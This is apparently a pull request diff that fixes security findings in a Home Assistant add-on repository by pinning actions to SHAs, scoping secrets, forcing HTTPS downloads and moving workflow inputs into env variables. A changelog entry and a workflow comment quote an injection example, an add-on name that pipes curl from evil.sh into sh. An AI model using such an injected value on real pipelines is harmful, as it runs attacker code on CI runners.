### PR TITLE
fix(security): resolved SonarCloud security findings

### DIFF
--- a/.changes/unreleased/1787712037100000000-1000.yaml
+++ b/.changes/unreleased/1787712037100000000-1000.yaml
@@ -1,0 +1,3 @@
+kind: 'Security'
+body: 'enforced HTTPS on every artifact download. All 115 `curl` invocations across the 19 add-on `Dockerfile`s and the three `yq` downloads in the workflows now pass `--proto ''=https'' --proto-redir ''=https''`, so neither the initial request nor any redirect hop can be steered onto plain HTTP. The workflow downloads previously used `wget --https-only`, which blocks the downgrade in practice but is not what the scanner recognises; they are now `curl` for consistency with the `Dockerfile`s and to clear the rule.'
+time: '2026-08-26T02:40:37.000000000Z'

--- a/.changes/unreleased/1787712037100007919-13e5.yaml
+++ b/.changes/unreleased/1787712037100007919-13e5.yaml
@@ -1,0 +1,3 @@
+kind: 'Security'
+body: 'removed a shell injection in the `Build and Push Docker Images` workflow. `inputs.addon`, supplied by whoever triggers a `workflow_dispatch`, was interpolated straight into the `detect-changes` script, so an add-on name such as `x"; curl evil.sh | sh; #` ran as code on the runner. Every context value that step reads is now passed through `env:` and dereferenced as a shell variable, where it can only ever be data.'
+time: '2026-08-26T02:40:37.000000000Z'

--- a/.changes/unreleased/1787712037100015838-17ca.yaml
+++ b/.changes/unreleased/1787712037100015838-17ca.yaml
@@ -1,0 +1,3 @@
+kind: 'Security'
+body: 'pinned every GitHub Actions dependency to a full commit SHA — seven third-party actions and the three reusable workflows this repository calls — so a compromised or repointed tag cannot change what runs in CI. Each pin carries the human-readable version in a trailing comment, and a new `.github/dependabot.yaml` schedules weekly `github-actions` updates, because a pin nothing advances is just a stale dependency.'
+time: '2026-08-26T02:40:37.000000000Z'

--- a/.changes/unreleased/1787712037100023757-1baf.yaml
+++ b/.changes/unreleased/1787712037100023757-1baf.yaml
@@ -1,0 +1,3 @@
+kind: 'Security'
+body: 'narrowed the secrets handed to the Claude reusable workflows. `claude.yaml` and `claude-code-review.yaml` passed `secrets: inherit`, giving workflows in another repository every secret this one holds; they now pass only `CLAUDE_CODE_OAUTH_TOKEN`, the single secret those workflows declare as required.'
+time: '2026-08-26T02:40:37.000000000Z'

--- a/.changes/unreleased/1787712037100031676-1f94.yaml
+++ b/.changes/unreleased/1787712037100031676-1f94.yaml
@@ -1,3 +1,3 @@
 kind: 'Security'
-body: 'hardened the `mcp-server-extended` image build. `pdm` is pinned to `2.28.2` and installed with `--only-binary :all:`, so the build neither drifts to whatever version is newest at build time nor executes a source distribution''s `setup.py`; and `COPY pyproject.toml pdm.lock* ./` no longer uses a glob, which is how unintended files reach an image.'
+body: 'hardened the `mcp-server-extended` image build. `pdm` is pinned to `2.28.2` and installed with `--only-binary :all:`, so the build neither drifts to whatever version is newest at build time nor executes a source distribution''s `setup.py` — with a single scoped exception for `msgpack`, which publishes no musllinux `armv7` wheel and would otherwise make the `armv7` build unresolvable; and `COPY pyproject.toml pdm.lock* ./` no longer uses a glob, which is how unintended files reach an image.'
 time: '2026-08-26T02:40:37.000000000Z'

--- a/.changes/unreleased/1787712037100031676-1f94.yaml
+++ b/.changes/unreleased/1787712037100031676-1f94.yaml
@@ -1,0 +1,3 @@
+kind: 'Security'
+body: 'hardened the `mcp-server-extended` image build. `pdm` is pinned to `2.28.2` and installed with `--only-binary :all:`, so the build neither drifts to whatever version is newest at build time nor executes a source distribution''s `setup.py`; and `COPY pyproject.toml pdm.lock* ./` no longer uses a glob, which is how unintended files reach an image.'
+time: '2026-08-26T02:40:37.000000000Z'

--- a/.changes/unreleased/1787712037100039595-2379.yaml
+++ b/.changes/unreleased/1787712037100039595-2379.yaml
@@ -1,0 +1,3 @@
+kind: 'Changed'
+body: 'made `HA_URL` required in `mcp-server-extended` instead of defaulting to `http://homeassistant.local:8123`. The old default hardcoded an unencrypted endpoint and silently aimed requests — bearer token included — at a guessed host whenever the variable was unset. The add-on always exports it from `config.yaml`, so add-on users see no change; the nested `CHANGELOG.md` records the effect on direct users of the MCP server.'
+time: '2026-08-26T02:40:37.000000000Z'

--- a/.github/copilot-instructions.md
+++ b/.github/copilot-instructions.md
@@ -56,6 +56,7 @@ Each add-on directory must contain a `config.yaml` file following the Home Assis
 - **Required fields**: `name`, `version`, `slug`, `description`, `arch`, `url`, `startup`
 - **Common optional fields**: `hassio_api`, `homeassistant`, `host_ipc`, `host_network`, `host_dbus`, `image`, `ingress`, `ingress_port`, `ingress_stream`, `init`, `map`, `options`, `schema`, `ports`, `ports_description`, `stage`
 - **Version format**: Semantic versioning (e.g., `1.0.0`)
+- **Security invariants**: downloads pass `--proto '=https' --proto-redir '=https'`; workflow context values reach `run:` scripts through `env:` rather than `${{ }}` interpolation; every `uses:` is pinned to a full commit SHA (Dependabot bumps them); reusable workflows receive only the secrets they declare.
 - **Supported architectures**: `amd64`, `aarch64`, `armv7` (all add-ons support amd64 and aarch64; several also support armv7). An upstream image without a manifest for a target architecture does not force dropping it: arch-neutral payloads are copied from a `FROM --platform=${BUILDPLATFORM}` stage, and native binaries are compiled from source against `${BUILD_FROM}`.
 - **Startup types**: `application`, `services`, `system`, `once`
 - **Stage values**: `stable`, `experimental` (default to `experimental` for new add-ons)

--- a/.github/dependabot.yaml
+++ b/.github/dependabot.yaml
@@ -1,0 +1,19 @@
+---
+# Actions and reusable workflows in this repository are pinned to full commit
+# SHAs, which is what makes a supply-chain compromise of a moving tag a
+# non-event here. A pin with nothing to advance it is just a stale dependency,
+# so Dependabot owns bumping them and rewrites the trailing `# vX.Y.Z` comment
+# as it goes.
+version: 2
+
+updates:
+  - package-ecosystem: 'github-actions'
+    directory: '/'
+    schedule:
+      interval: 'weekly'
+    commit-message:
+      prefix: 'chore(deps)'
+    groups:
+      github-actions:
+        patterns:
+          - '*'

--- a/.github/workflows/_build-addon.yaml
+++ b/.github/workflows/_build-addon.yaml
@@ -34,7 +34,7 @@ jobs:
 
     steps:
       - name: Checkout code
-        uses: actions/checkout@v6
+        uses: actions/checkout@d23441a48e516b6c34aea4fa41551a30e30af803 # v6.1.0
 
       - name: Map architecture to Docker platform
         id: platform
@@ -63,16 +63,16 @@ jobs:
 
       - name: Set up QEMU
         if: steps.platform.outputs.qemu_platforms != ''
-        uses: docker/setup-qemu-action@v4
+        uses: docker/setup-qemu-action@96fe6ef7f33517b61c61be40b68a1882f3264fb8 # v4.2.0
         with:
           platforms: ${{ steps.platform.outputs.qemu_platforms }}
 
       - name: Set up Docker Buildx
-        uses: docker/setup-buildx-action@v4
+        uses: docker/setup-buildx-action@37fe631027851001ddb9b187196cc803df7f5f0e # v4.3.0
 
       - name: Log in to GitHub Container Registry
         if: github.event_name != 'pull_request'
-        uses: docker/login-action@v4
+        uses: docker/login-action@dbcb813823bdd20940b903addbd779551569679f # v4.6.0
         with:
           registry: ${{ env.REGISTRY }}
           username: ${{ github.actor }}
@@ -82,7 +82,10 @@ jobs:
         id: buildargs
         run: |
           YQ_ARCH=$(dpkg --print-architecture)
-          wget --https-only -qO /usr/local/bin/yq \
+          # `--proto`/`--proto-redir` restrict both the initial request and
+          # every redirect hop to HTTPS, so the release download cannot be
+          # steered onto plain HTTP part-way through the chain.
+          curl --proto '=https' --proto-redir '=https' -fsSL -o /usr/local/bin/yq \
             "https://github.com/mikefarah/yq/releases/latest/download/yq_linux_${YQ_ARCH}"
           chmod +x /usr/local/bin/yq
 
@@ -112,7 +115,7 @@ jobs:
 
       - name: Build (PR validation)
         if: github.event_name == 'pull_request'
-        uses: docker/build-push-action@v7
+        uses: docker/build-push-action@53b7df96c91f9c12dcc8a07bcb9ccacbed38856a # v7.3.0
         with:
           context: ./${{ inputs.addon }}
           platforms: ${{ steps.platform.outputs.platform }}
@@ -128,7 +131,7 @@ jobs:
       - name: Build and push by digest
         if: github.event_name != 'pull_request'
         id: build
-        uses: docker/build-push-action@v7
+        uses: docker/build-push-action@53b7df96c91f9c12dcc8a07bcb9ccacbed38856a # v7.3.0
         with:
           context: ./${{ inputs.addon }}
           platforms: ${{ steps.platform.outputs.platform }}
@@ -149,7 +152,7 @@ jobs:
 
       - name: Upload digest
         if: github.event_name != 'pull_request'
-        uses: actions/upload-artifact@v7
+        uses: actions/upload-artifact@043fb46d1a93c77aae656e7c1c64a875d1fc6a0a # v7.0.1
         with:
           name: digest-${{ inputs.addon }}-${{ inputs.arch }}
           path: /tmp/digests/*

--- a/.github/workflows/build.yaml
+++ b/.github/workflows/build.yaml
@@ -28,37 +28,49 @@ jobs:
 
     steps:
       - name: Checkout code
-        uses: actions/checkout@v6
+        uses: actions/checkout@d23441a48e516b6c34aea4fa41551a30e30af803 # v6.1.0
         with:
           fetch-depth: 0
 
       - name: Install yq
         run: |
-          wget --https-only -qO /usr/local/bin/yq https://github.com/mikefarah/yq/releases/latest/download/yq_linux_amd64
+          curl --proto '=https' --proto-redir '=https' -fsSL -o /usr/local/bin/yq \
+            https://github.com/mikefarah/yq/releases/latest/download/yq_linux_amd64
           chmod +x /usr/local/bin/yq
 
       - name: Detect changes and build matrix
         id: set-matrix
+        # Context values are passed through the environment rather than
+        # interpolated into the script body. `inputs.addon` is supplied by
+        # whoever triggers a `workflow_dispatch`, so expanding it directly into
+        # the shell let an add-on name like `x"; curl evil.sh | sh; #` execute as
+        # code. Read as `"$INPUT_ADDON"`, the value is only ever data.
+        env:
+          EVENT_NAME: ${{ github.event_name }}
+          GIT_REF: ${{ github.ref }}
+          INPUT_ADDON: ${{ inputs.addon }}
+          PR_BASE_SHA: ${{ github.event.pull_request.base.sha }}
+          PUSH_BEFORE_SHA: ${{ github.event.before }}
         run: |
           # Discover all add-on folders (those containing a config.yaml)
           ALL_ADDONS=$(find . -maxdepth 2 -name config.yaml -not -path './.github/*' -exec dirname {} \; | sed 's|^./||' | sort)
 
           CHANGED_ADDONS=""
 
-          if [[ "${{ github.event_name }}" == "workflow_dispatch" ]]; then
-            if [[ -n "${{ inputs.addon }}" ]]; then
-              CHANGED_ADDONS="${{ inputs.addon }}"
+          if [[ "$EVENT_NAME" == "workflow_dispatch" ]]; then
+            if [[ -n "$INPUT_ADDON" ]]; then
+              CHANGED_ADDONS="$INPUT_ADDON"
             else
               CHANGED_ADDONS="$ALL_ADDONS"
             fi
-          elif [[ "${{ github.ref }}" == refs/tags/* || "${{ github.ref }}" == "refs/heads/main" ]]; then
+          elif [[ "$GIT_REF" == refs/tags/* || "$GIT_REF" == "refs/heads/main" ]]; then
             CHANGED_ADDONS="$ALL_ADDONS"
           else
             # Determine base commit for diff
-            if [[ "${{ github.event_name }}" == "pull_request" ]]; then
-              BASE_SHA="${{ github.event.pull_request.base.sha }}"
+            if [[ "$EVENT_NAME" == "pull_request" ]]; then
+              BASE_SHA="$PR_BASE_SHA"
             else
-              BASE_SHA="${{ github.event.before }}"
+              BASE_SHA="$PUSH_BEFORE_SHA"
             fi
 
             # Handle initial push (all zeros SHA)
@@ -183,17 +195,18 @@ jobs:
 
     steps:
       - name: Checkout code
-        uses: actions/checkout@v6
+        uses: actions/checkout@d23441a48e516b6c34aea4fa41551a30e30af803 # v6.1.0
 
       - name: Install yq
         run: |
-          wget --https-only -qO /usr/local/bin/yq https://github.com/mikefarah/yq/releases/latest/download/yq_linux_amd64
+          curl --proto '=https' --proto-redir '=https' -fsSL -o /usr/local/bin/yq \
+            https://github.com/mikefarah/yq/releases/latest/download/yq_linux_amd64
           chmod +x /usr/local/bin/yq
 
       - name: Download digests
         id: download
         continue-on-error: true
-        uses: actions/download-artifact@v8
+        uses: actions/download-artifact@3e5f45b2cfb9172054b4087a40e8e0b5a5461e7c # v8.0.1
         with:
           pattern: digest-${{ matrix.addon }}-*
           path: /tmp/digests
@@ -230,7 +243,7 @@ jobs:
 
       - name: Log in to GitHub Container Registry
         if: steps.verify.outputs.complete == 'true'
-        uses: docker/login-action@v4
+        uses: docker/login-action@dbcb813823bdd20940b903addbd779551569679f # v4.6.0
         with:
           registry: ghcr.io
           username: ${{ github.actor }}
@@ -238,7 +251,7 @@ jobs:
 
       - name: Set up Docker Buildx
         if: steps.verify.outputs.complete == 'true'
-        uses: docker/setup-buildx-action@v4
+        uses: docker/setup-buildx-action@37fe631027851001ddb9b187196cc803df7f5f0e # v4.3.0
 
       - name: Create multi-arch manifest
         if: steps.verify.outputs.complete == 'true'

--- a/.github/workflows/claude-code-review.yaml
+++ b/.github/workflows/claude-code-review.yaml
@@ -6,8 +6,12 @@ on:
 
 jobs:
   claude-review:
-    uses: 'rios0rios0/.github/.github/workflows/claude-code-review.yaml@main'
-    secrets: inherit
+    uses: rios0rios0/.github/.github/workflows/claude-code-review.yaml@227dd3f305c19f78a7074ac0cb53b08de2b37ab0 # main
+    # Scoped to the one secret the called workflow declares as required,
+    # rather than `inherit`, which hands an external workflow every secret
+    # in this repository.
+    secrets:
+      CLAUDE_CODE_OAUTH_TOKEN: ${{ secrets.CLAUDE_CODE_OAUTH_TOKEN }}
     permissions:
       contents: 'read'
       pull-requests: 'write'

--- a/.github/workflows/claude.yaml
+++ b/.github/workflows/claude.yaml
@@ -12,8 +12,12 @@ on:
 
 jobs:
   claude:
-    uses: 'rios0rios0/.github/.github/workflows/claude.yaml@main'
-    secrets: inherit
+    uses: rios0rios0/.github/.github/workflows/claude.yaml@227dd3f305c19f78a7074ac0cb53b08de2b37ab0 # main
+    # Scoped to the one secret the called workflow declares as required,
+    # rather than `inherit`, which hands an external workflow every secret
+    # in this repository.
+    secrets:
+      CLAUDE_CODE_OAUTH_TOKEN: ${{ secrets.CLAUDE_CODE_OAUTH_TOKEN }}
     permissions:
       contents: 'write'
       pull-requests: 'write'

--- a/.github/workflows/release.yaml
+++ b/.github/workflows/release.yaml
@@ -10,4 +10,4 @@ permissions:
 
 jobs:
   release:
-    uses: 'rios0rios0/pipelines/.github/workflows/release.yaml@main'
+    uses: rios0rios0/pipelines/.github/workflows/release.yaml@340366d49dfec814ebce9904d225c3f938053e99 # main

--- a/CLAUDE.md
+++ b/CLAUDE.md
@@ -80,6 +80,11 @@ pdm run ruff check .        # lint
 - **Changelog**: the root `CHANGELOG.md` is generated and is not edited by hand -- a repository-level change writes its own fragment under `.changes/unreleased/` with `chlog new --kind <Kind> --body "..."` (see the chlog section below); `mcp-server-extended/` keeps its own nested `CHANGELOG.md` for the Python package.
 - **n8n workflows**: `n8n/workflows/*.json` are importable workflow definitions (not code the container runs). The add-on itself is an upstream-image wrapper; the JSON files are shipped for users to import into their n8n instance.
 
+- **Downloads**: every `curl` in a `Dockerfile` and every download in a workflow passes `--proto '=https' --proto-redir '=https'`, so neither the request nor any redirect hop can fall back to plain HTTP. Copy the flags when adding a new download.
+- **Workflow inputs**: never interpolate `${{ ... }}` directly into a `run:` script. Pass the value through `env:` and read it as a shell variable — `inputs.addon` is attacker-controlled on `workflow_dispatch`, and direct interpolation executes it as code.
+- **Action pinning**: every `uses:` is pinned to a full commit SHA with the version in a trailing comment. Dependabot (`.github/dependabot.yaml`) bumps them weekly; do not replace a pin with a moving tag.
+- **Secrets**: pass reusable workflows only the secrets they declare. `secrets: inherit` hands an external workflow every secret in this repository.
+
 ## YAML Conventions
 
 - Always `.yaml`, never `.yml` (CI workflows in this repo already follow this).

--- a/changedetection/Dockerfile
+++ b/changedetection/Dockerfile
@@ -42,20 +42,20 @@ RUN set -x \
        else \
            export S6_ARCH="${BUILD_ARCH}"; \
        fi \
-    && curl -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-${S6_ARCH}.tar.xz" \
+    && curl --proto '=https' --proto-redir '=https' -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-${S6_ARCH}.tar.xz" \
        | tar Jxvf - -C / \
-    && curl -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-noarch.tar.xz" \
+    && curl --proto '=https' --proto-redir '=https' -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-noarch.tar.xz" \
        | tar Jxvf - -C / \
-    && curl -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-symlinks-arch.tar.xz" \
+    && curl --proto '=https' --proto-redir '=https' -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-symlinks-arch.tar.xz" \
        | tar Jxvf - -C / \
-    && curl -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-symlinks-noarch.tar.xz" \
+    && curl --proto '=https' --proto-redir '=https' -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-symlinks-noarch.tar.xz" \
        | tar Jxvf - -C / \
     && mkdir -p /etc/fix-attrs.d /etc/services.d \
-    && curl -L -f -s -o /usr/bin/tempio \
+    && curl --proto '=https' --proto-redir '=https' -L -f -s -o /usr/bin/tempio \
          "https://github.com/home-assistant/tempio/releases/download/${TEMPIO_VERSION}/tempio_${BUILD_ARCH}" \
     && chmod a+x /usr/bin/tempio \
     && mkdir -p /usr/src/bashio \
-    && curl -L -f -s "https://github.com/hassio-addons/bashio/archive/v${BASHIO_VERSION}.tar.gz" \
+    && curl --proto '=https' --proto-redir '=https' -L -f -s "https://github.com/hassio-addons/bashio/archive/v${BASHIO_VERSION}.tar.gz" \
        | tar -xzf - --strip 1 -C /usr/src/bashio \
     && mv /usr/src/bashio/lib /usr/lib/bashio \
     && ln -sf /usr/lib/bashio/bashio /usr/bin/bashio \

--- a/grocy/Dockerfile
+++ b/grocy/Dockerfile
@@ -59,20 +59,20 @@ RUN set -x \
        else \
            export S6_ARCH="${BUILD_ARCH}"; \
        fi \
-    && curl -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-${S6_ARCH}.tar.xz" \
+    && curl --proto '=https' --proto-redir '=https' -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-${S6_ARCH}.tar.xz" \
        | tar Jxvf - -C / \
-    && curl -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-noarch.tar.xz" \
+    && curl --proto '=https' --proto-redir '=https' -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-noarch.tar.xz" \
        | tar Jxvf - -C / \
-    && curl -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-symlinks-arch.tar.xz" \
+    && curl --proto '=https' --proto-redir '=https' -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-symlinks-arch.tar.xz" \
        | tar Jxvf - -C / \
-    && curl -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-symlinks-noarch.tar.xz" \
+    && curl --proto '=https' --proto-redir '=https' -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-symlinks-noarch.tar.xz" \
        | tar Jxvf - -C / \
     && mkdir -p /etc/fix-attrs.d /etc/services.d \
-    && curl -L -f -s -o /usr/bin/tempio \
+    && curl --proto '=https' --proto-redir '=https' -L -f -s -o /usr/bin/tempio \
          "https://github.com/home-assistant/tempio/releases/download/${TEMPIO_VERSION}/tempio_${BUILD_ARCH}" \
     && chmod a+x /usr/bin/tempio \
     && mkdir -p /usr/src/bashio \
-    && curl -L -f -s "https://github.com/hassio-addons/bashio/archive/v${BASHIO_VERSION}.tar.gz" \
+    && curl --proto '=https' --proto-redir '=https' -L -f -s "https://github.com/hassio-addons/bashio/archive/v${BASHIO_VERSION}.tar.gz" \
        | tar -xzf - --strip 1 -C /usr/src/bashio \
     && mv /usr/src/bashio/lib /usr/lib/bashio \
     && ln -sf /usr/lib/bashio/bashio /usr/bin/bashio \

--- a/homebox/Dockerfile
+++ b/homebox/Dockerfile
@@ -40,20 +40,20 @@ RUN set -x \
        else \
            export S6_ARCH="${BUILD_ARCH}"; \
        fi \
-    && curl -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-${S6_ARCH}.tar.xz" \
+    && curl --proto '=https' --proto-redir '=https' -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-${S6_ARCH}.tar.xz" \
        | tar Jxvf - -C / \
-    && curl -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-noarch.tar.xz" \
+    && curl --proto '=https' --proto-redir '=https' -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-noarch.tar.xz" \
        | tar Jxvf - -C / \
-    && curl -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-symlinks-arch.tar.xz" \
+    && curl --proto '=https' --proto-redir '=https' -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-symlinks-arch.tar.xz" \
        | tar Jxvf - -C / \
-    && curl -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-symlinks-noarch.tar.xz" \
+    && curl --proto '=https' --proto-redir '=https' -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-symlinks-noarch.tar.xz" \
        | tar Jxvf - -C / \
     && mkdir -p /etc/fix-attrs.d /etc/services.d \
-    && curl -L -f -s -o /usr/bin/tempio \
+    && curl --proto '=https' --proto-redir '=https' -L -f -s -o /usr/bin/tempio \
          "https://github.com/home-assistant/tempio/releases/download/${TEMPIO_VERSION}/tempio_${BUILD_ARCH}" \
     && chmod a+x /usr/bin/tempio \
     && mkdir -p /usr/src/bashio \
-    && curl -L -f -s "https://github.com/hassio-addons/bashio/archive/v${BASHIO_VERSION}.tar.gz" \
+    && curl --proto '=https' --proto-redir '=https' -L -f -s "https://github.com/hassio-addons/bashio/archive/v${BASHIO_VERSION}.tar.gz" \
        | tar -xzf - --strip 1 -C /usr/src/bashio \
     && mv /usr/src/bashio/lib /usr/lib/bashio \
     && ln -sf /usr/lib/bashio/bashio /usr/bin/bashio \

--- a/huginn/Dockerfile
+++ b/huginn/Dockerfile
@@ -45,20 +45,20 @@ RUN set -x \
        else \
            export S6_ARCH="${BUILD_ARCH}"; \
        fi \
-    && curl -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-${S6_ARCH}.tar.xz" \
+    && curl --proto '=https' --proto-redir '=https' -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-${S6_ARCH}.tar.xz" \
        | tar Jxvf - -C / \
-    && curl -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-noarch.tar.xz" \
+    && curl --proto '=https' --proto-redir '=https' -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-noarch.tar.xz" \
        | tar Jxvf - -C / \
-    && curl -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-symlinks-arch.tar.xz" \
+    && curl --proto '=https' --proto-redir '=https' -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-symlinks-arch.tar.xz" \
        | tar Jxvf - -C / \
-    && curl -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-symlinks-noarch.tar.xz" \
+    && curl --proto '=https' --proto-redir '=https' -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-symlinks-noarch.tar.xz" \
        | tar Jxvf - -C / \
     && mkdir -p /etc/fix-attrs.d /etc/services.d \
-    && curl -L -f -s -o /usr/bin/tempio \
+    && curl --proto '=https' --proto-redir '=https' -L -f -s -o /usr/bin/tempio \
          "https://github.com/home-assistant/tempio/releases/download/${TEMPIO_VERSION}/tempio_${BUILD_ARCH}" \
     && chmod a+x /usr/bin/tempio \
     && mkdir -p /usr/src/bashio \
-    && curl -L -f -s "https://github.com/hassio-addons/bashio/archive/v${BASHIO_VERSION}.tar.gz" \
+    && curl --proto '=https' --proto-redir '=https' -L -f -s "https://github.com/hassio-addons/bashio/archive/v${BASHIO_VERSION}.tar.gz" \
        | tar -xzf - --strip 1 -C /usr/src/bashio \
     && mv /usr/src/bashio/lib /usr/lib/bashio \
     && ln -sf /usr/lib/bashio/bashio /usr/bin/bashio \

--- a/it-tools/Dockerfile
+++ b/it-tools/Dockerfile
@@ -51,20 +51,20 @@ RUN set -x \
        else \
            export S6_ARCH="${BUILD_ARCH}"; \
        fi \
-    && curl -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-${S6_ARCH}.tar.xz" \
+    && curl --proto '=https' --proto-redir '=https' -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-${S6_ARCH}.tar.xz" \
        | tar Jxvf - -C / \
-    && curl -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-noarch.tar.xz" \
+    && curl --proto '=https' --proto-redir '=https' -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-noarch.tar.xz" \
        | tar Jxvf - -C / \
-    && curl -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-symlinks-arch.tar.xz" \
+    && curl --proto '=https' --proto-redir '=https' -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-symlinks-arch.tar.xz" \
        | tar Jxvf - -C / \
-    && curl -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-symlinks-noarch.tar.xz" \
+    && curl --proto '=https' --proto-redir '=https' -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-symlinks-noarch.tar.xz" \
        | tar Jxvf - -C / \
     && mkdir -p /etc/fix-attrs.d /etc/services.d \
-    && curl -L -f -s -o /usr/bin/tempio \
+    && curl --proto '=https' --proto-redir '=https' -L -f -s -o /usr/bin/tempio \
          "https://github.com/home-assistant/tempio/releases/download/${TEMPIO_VERSION}/tempio_${BUILD_ARCH}" \
     && chmod a+x /usr/bin/tempio \
     && mkdir -p /usr/src/bashio \
-    && curl -L -f -s "https://github.com/hassio-addons/bashio/archive/v${BASHIO_VERSION}.tar.gz" \
+    && curl --proto '=https' --proto-redir '=https' -L -f -s "https://github.com/hassio-addons/bashio/archive/v${BASHIO_VERSION}.tar.gz" \
        | tar -xzf - --strip 1 -C /usr/src/bashio \
     && mv /usr/src/bashio/lib /usr/lib/bashio \
     && ln -sf /usr/lib/bashio/bashio /usr/bin/bashio \

--- a/linkwarden/Dockerfile
+++ b/linkwarden/Dockerfile
@@ -42,20 +42,20 @@ RUN set -x \
        else \
            export S6_ARCH="${BUILD_ARCH}"; \
        fi \
-    && curl -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-${S6_ARCH}.tar.xz" \
+    && curl --proto '=https' --proto-redir '=https' -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-${S6_ARCH}.tar.xz" \
        | tar Jxvf - -C / \
-    && curl -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-noarch.tar.xz" \
+    && curl --proto '=https' --proto-redir '=https' -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-noarch.tar.xz" \
        | tar Jxvf - -C / \
-    && curl -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-symlinks-arch.tar.xz" \
+    && curl --proto '=https' --proto-redir '=https' -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-symlinks-arch.tar.xz" \
        | tar Jxvf - -C / \
-    && curl -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-symlinks-noarch.tar.xz" \
+    && curl --proto '=https' --proto-redir '=https' -L -f -s "https://github.com/just-containers/s6-overlay/releases/download/v${S6_OVERLAY_VERSION}/s6-overlay-symlinks-noarch.tar.xz" \
        | tar Jxvf - -C / \
     && mkdir -p /etc/fix-attrs.d /etc/services.d \
-    && curl -L -f -s -o /usr/bin/tempio \
+    && curl --proto '=https' --proto-redir '=https' -L -f -s -o /usr/bin/tempio \
          "https://github.com/home-assistant/tempio/releases/download/${TEMPIO_VERSION}/tempio_${BUILD_ARCH}" \
     && chmod a+x /usr/bin/tempio \
     && mkdir -p /usr/src/bashio \
-    && curl -L -f -s "https://github.com/hassio-addons/bashio/archive/v${BASHIO_VERSION}.tar.gz" \
+    && curl --proto '=https' --proto-redir '=https' -L -f -s "https://github.com/hassio-addons/bashio/archive/v${BASHIO_VERSION}.tar.gz" \
        | tar -xzf - --strip 1 -C /usr/src/bashio \
     && mv /usr/src/bashio/lib /usr/lib/bashio \
     && ln -sf /usr/lib/bashio/bashio /usr/bin/bashio \

